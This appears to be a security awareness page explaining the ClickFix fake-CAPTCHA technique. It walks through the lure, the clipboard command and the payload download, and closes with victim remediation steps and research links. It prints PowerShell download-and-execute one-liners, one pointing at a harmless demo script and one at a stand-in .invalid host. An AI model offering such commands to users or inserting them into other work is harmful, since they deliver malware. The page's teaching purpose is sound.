ClickFix: from fake CAPTCHA to command execution
ClickFix is a social engineering technique that uses fake CAPTCHAs or error messages to trick someone into copying and running a command. The command typically downloads malware.
The interactive demo below reproduces this sequence using a harmless script.
- 1Lure
- 2Instructions
- 3Command
- 4Result
Let’s confirm you’re human.
This quick check helps protect the site from automated traffic.
- 1
Press Windows + R
- 2
Press Ctrl + V
- 3
Press Enter
The page claims a verification code is ready.
powershell -NoProfile -Command "irm 'https://www.clickfix.fyi/static/example.ps1' | iex"This downloads and runs the script. Read it first.
ClickFix demo: the downloaded script is harmless. No files changed. No data collected.
How it works
ClickFix is a way to deliver malware, not a specific piece of malware. What gets installed varies between campaigns.
- The page shows a fake prompt.
A malicious or compromised page displays a familiar CAPTCHA, browser error, meeting problem, or document error.
- The button copies a command.
The button claims to copy a verification code or fix. It copies a command instead.
- The user opens a system tool.
The page directs the user to open Run, PowerShell, Terminal, Command Prompt, or File Explorer.
- The user runs the command.
The system tool executes whatever the attacker placed on the clipboard.
The reservedpowershell.exe -NoProfile -WindowStyle Hidden -Command "irm https://secure-check.example.invalid/update.ps1 | iex".invaliddomain cannot resolve, so this example cannot download a payload. - The command downloads malware.
The downloaded malware then runs on the device.
Common fake prompts
- “Verify you are human”
- “Your browser needs an update”
- “The document cannot be displayed”
- “Your microphone or meeting connection failed”
If you ran the command
- Disconnect the affected computer. Turn off Wi-Fi and unplug the network cable.
- Secure your accounts. From another device, sign out active sessions and change credentials that may have been exposed.
- Clean or rebuild the device. A clean antivirus scan does not prove the malware is gone. Reinstall the operating system or have the device inspected.
ClickFix news
- Think before you Click(Fix): analyzing the ClickFix social engineering techniqueMicrosoft Threat Intelligence
- FileFix: the new social engineering attack building on ClickFixCheck Point Research
- ESET Threat Report H1 2025ESET Research
- Behavior:Win32/ClickFixMicrosoft Security Intelligence
- Security brief: ClickFix social engineering technique floods threat landscapeProofpoint Threat Research
- ClickFix attacks: health sector alertU.S. HHS HC3